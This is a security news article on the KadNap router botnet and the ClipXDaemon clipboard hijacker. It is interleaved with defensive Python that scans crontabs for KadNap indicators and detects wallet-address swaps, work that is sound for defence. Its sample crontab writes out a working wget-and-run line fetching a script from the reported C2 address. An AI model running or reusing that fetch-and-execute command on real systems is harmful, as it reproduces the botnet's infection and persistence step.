KadNap Malware Infects 14,000+ Edge Devices to Power Stealth Proxy Botnet

News Room
Published 10 March 2026, last updated 2026/03/10 at 12:59 PM
Cybersecurity researchers have discovered a new malware called KadNap that’s primarily targeting Asus routers to enlist them into a botnet for proxying malicious traffic.

The malware, first detected in the wild in August 2025, has expanded to over 14,000 infected devices, with more than 60% of victims located in the U.S., according to the Black Lotus Labs team at Lumen. A smaller number of infections have been detected in Taiwan, Hong Kong, Russia, the U.K., Australia, Brazil, France, Italy, and Spain.

“KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring,” the cybersecurity company said in a report shared with The Hacker News.

Compromised nodes in the network leverage the DHT protocol to locate and connect with a command-and-control (C2) server, which makes the botnet resilient to detection and disruption efforts.

Once devices are successfully compromised, they are marketed by a proxy service named Doppelgänger (“doppelganger[.]shop”), which is assessed to be a rebrand of Faceless, another proxy service associated with TheMoon malware. Doppelgänger, according to its website, claims to offer resident proxies in over 50 countries that provide “100% anonymity.” The service is said to have launched in May/June 2025.

Despite the focus on Asus routers, the operators of KadNap have been found to deploy the malware against an assorted set of edge networking devices.

Central to the attack is a shell script (“aic.sh”) downloaded from the C2 server (“212.104.141[.]140”), which starts the process of enrolling the victim device into the P2P network. The script creates a cron job that retrieves the shell script from the server at the 55-minute mark of every hour, renames it to “.asusrouter,” and runs it.

Once persistence is established, the script pulls a malicious ELF file, renames it to “kad,” and executes it. This, in turn, leads to the deployment of KadNap. The malware is capable of targeting devices running both ARM and MIPS processors.

KadNap is also designed to connect to a Network Time Protocol (NTP) server to fetch the current time and store it along with the host uptime. This information serves as a basis to create a hash that’s used to locate other peers in the decentralized network to receive commands or download additional files.

The files fwr.sh and /tmp/.sose contain functionality to close port 22, the standard TCP port for Secure Shell (SSH), on the infected device and to extract a list of C2 IP address:port combinations to connect to.
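The persistence chain described above (an hourly minute-55 cron entry that fetches a script from the C2 host, the “.asusrouter” and “kad” file names, and the fwr.sh and /tmp/.sose helpers) gives a defender concrete host-level indicators to hunt for. The scanner below is an added example and is not code from the article or from Lumen; it reads a crontab in text form and flags entries that reference the reported C2 address or file names, or that match the hourly minute-55 remote-fetch schedule. The sample crontab is constructed for the example; the function and variable names are my own.

```python
import re

# Indicators taken from the article: the C2 host the dropper is fetched from,
# the file names the dropper and payload use on disk, and the cron schedule.
C2_HOST = "212.104.141.140"
DROPPED_NAMES = (".asusrouter", "aic.sh", "kad", "fwr.sh", ".sose")
FETCH_TOOLS = ("wget", "curl", "tftp", "ftpget")

# Five schedule fields followed by the command; comments/blank lines are skipped.
CRON_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")

# Match a file name as a whole path component, so "kad" does not hit "kadmin".
NAME_PATTERNS = {
    name: re.compile(r"(?<![\w.-])" + re.escape(name) + r"(?![\w.-])")
    for name in DROPPED_NAMES
}


def scan_crontab(text):
    """Return a list of suspicious crontab entries with the reasons each was flagged."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        match = CRON_LINE.match(line)
        if not match:
            continue
        minute, hour, _dom, _mon, _dow, cmd = match.groups()
        reasons = []
        if C2_HOST in cmd:
            reasons.append("command references the reported KadNap C2 host")
        for name, pattern in NAME_PATTERNS.items():
            if pattern.search(cmd):
                reasons.append(f"command references reported file name {name!r}")
        fetches_remote = any(tool in cmd for tool in FETCH_TOOLS)
        if minute == "55" and hour == "*" and fetches_remote:
            reasons.append("hourly minute-55 schedule fetching remote content matches the reported dropper")
        if reasons:
            findings.append({"line": lineno, "entry": line, "reasons": reasons})
    return findings


# Constructed sample: one benign entry, then two entries shaped like the article's description.
SAMPLE_CRONTAB = """\
# constructed sample crontab for the example
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
55 * * * * wget -q http://212.104.141.140/aic.sh -O /tmp/.asusrouter && sh /tmp/.asusrouter
*/10 * * * * /tmp/kad
"""

if __name__ == "__main__":
    for finding in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {finding['line']}: {finding['entry']}")
        for reason in finding["reasons"]:
            print(f"  - {reason}")
```

On a real device you would feed it the output of `crontab -l` for each user and the contents of the cron spool directory; the name and host checks are only as good as the indicators in the report, while the schedule heuristic catches the same behaviour under renamed files.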

“In short, the innovative use of the DHT protocol allows the malware to establish robust communication channels that are difficult to disrupt, by hiding in the noise of legitimate peer-to-peer traffic,” Lumen said.

Further analysis has determined that not all compromised devices communicate with every C2 server, indicating the infrastructure is segmented by device type and model.

The Black Lotus Labs team told The Hacker News that Doppelgänger’s bots are being abused by threat actors in the wild. “One issue there has been since these Asus (and other devices) are also sometimes co-infected with other malware, it is tricky to say who exactly is responsible for a specific malicious activity,” the company said.

Users running SOHO routers are advised to keep their devices up to date, reboot them regularly, change default passwords, secure management interfaces, and replace models that are end-of-life and are no longer supported.

“The KadNap botnet stands out among others that support anonymous proxies in its use of a peer-to-peer network for decentralized control,” Lumen concluded. “Their intention is clear, avoid detection and make it difficult for defenders to protect against.”

New Linux Threat ClipXDaemon Emerges

The disclosure comes as Cyble detailed a new Linux threat dubbed ClipXDaemon that’s designed to target cryptocurrency users by intercepting and altering copied wallet addresses. The clipper malware, delivered via a Linux post-exploitation framework called ShadowHS, has been described as an autonomous cryptocurrency clipboard hijacker targeting Linux X11 environments.

Staged entirely in memory, the malware employs stealth techniques, such as process masquerading and Wayland session avoidance, while simultaneously monitoring the clipboard every 200 milliseconds and substituting cryptocurrency addresses with attacker-controlled wallets. It’s capable of targeting Bitcoin, Ethereum, Litecoin, Monero, Tron, Dogecoin, Ripple, and TON wallets.

The decision to avoid execution in Wayland sessions is deliberate, as the display server protocol’s security architecture imposes additional controls, such as requiring explicit user interaction, before an application can read clipboard content. By disabling itself in such scenarios, the malware aims to reduce noise and avoid runtime failures.

“ClipXDaemon differs fundamentally from traditional Linux malware. It contains no command-and-control (C2) logic, performs no beaconing, and requires no remote tasking,” the company said. “Instead, it monetizes victims directly by hijacking cryptocurrency wallet addresses copied in X11 sessions and replacing them in real time with attacker-controlled addresses.”
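Because ClipXDaemon has no C2 traffic to spot on the network, the observable is the substitution itself: a wallet address on the clipboard being replaced, within a fraction of a second, by a different address of the same coin family. The code below is an added example, not Cyble’s or the page’s own code; it classifies clipboard contents by address shape for the eight coin families the article names and flags consecutive clipboard observations where one address is swapped for another of the same family inside a short window. The address patterns are syntactic only (no checksum validation), the window and the event list are assumptions of the example, and the sample addresses are constructed.

```python
import re

# Address-shape patterns for the coin families the article lists. These are
# format checks only; they do not validate checksums.
ADDRESS_PATTERNS = {
    "BTC": re.compile(r"^(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-z02-9]{39,59})$"),
    "ETH": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "LTC": re.compile(r"^(?:[LM][a-km-zA-HJ-NP-Z1-9]{26,33}|ltc1[ac-hj-np-z02-9]{39,59})$"),
    "XMR": re.compile(r"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$"),
    "TRX": re.compile(r"^T[1-9A-HJ-NP-Za-km-z]{33}$"),
    "DOGE": re.compile(r"^D[5-9A-HJ-NP-U][1-9A-HJ-NP-Za-km-z]{32}$"),
    "XRP": re.compile(r"^r[1-9A-HJ-NP-Za-km-z]{24,34}$"),
    "TON": re.compile(r"^(?:EQ|UQ)[A-Za-z0-9_-]{46}$"),
}


def classify_address(text):
    """Return the coin family whose address shape matches the text, or None."""
    candidate = text.strip()
    for coin, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(candidate):
            return coin
    return None


def detect_swaps(events, window_ms=1000):
    """Flag clipboard observations where a wallet address was replaced by a
    different address of the same family within window_ms.

    events: list of (timestamp_ms, clipboard_text) in chronological order, as a
    clipboard monitor would record them. A user copying a new address normally
    happens seconds or minutes apart; a clipper substitutes within milliseconds.
    """
    swaps = []
    for (t_prev, prev), (t_cur, cur) in zip(events, events[1:]):
        if prev == cur:
            continue
        coin_prev = classify_address(prev)
        coin_cur = classify_address(cur)
        if coin_prev is None or coin_prev != coin_cur:
            continue
        if t_cur - t_prev <= window_ms:
            swaps.append({
                "at_ms": t_cur,
                "coin": coin_cur,
                "original": prev.strip(),
                "replacement": cur.strip(),
            })
    return swaps


# Constructed clipboard timeline: the user copies an ETH address, it is replaced
# 200 ms later (the polling interval the article reports), and a minute later the
# user copies a different address themselves, which is not flagged.
SAMPLE_EVENTS = [
    (0, "meeting notes for tuesday"),
    (5000, "0x1111111111111111111111111111111111111111"),
    (5200, "0x2222222222222222222222222222222222222222"),
    (60000, "0x2222222222222222222222222222222222222222"),
    (120000, "0x3333333333333333333333333333333333333333"),
]

if __name__ == "__main__":
    for swap in detect_swaps(SAMPLE_EVENTS):
        print(f"{swap['coin']} address swapped at {swap['at_ms']} ms: "
              f"{swap['original']} -> {swap['replacement']}")
```

A wrapper that polls the X11 clipboard and feeds `detect_swaps` can alert the user before they paste; the same logic also works offline against a clipboard history log, which is the cheaper way to confirm a suspected infection after the fact.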
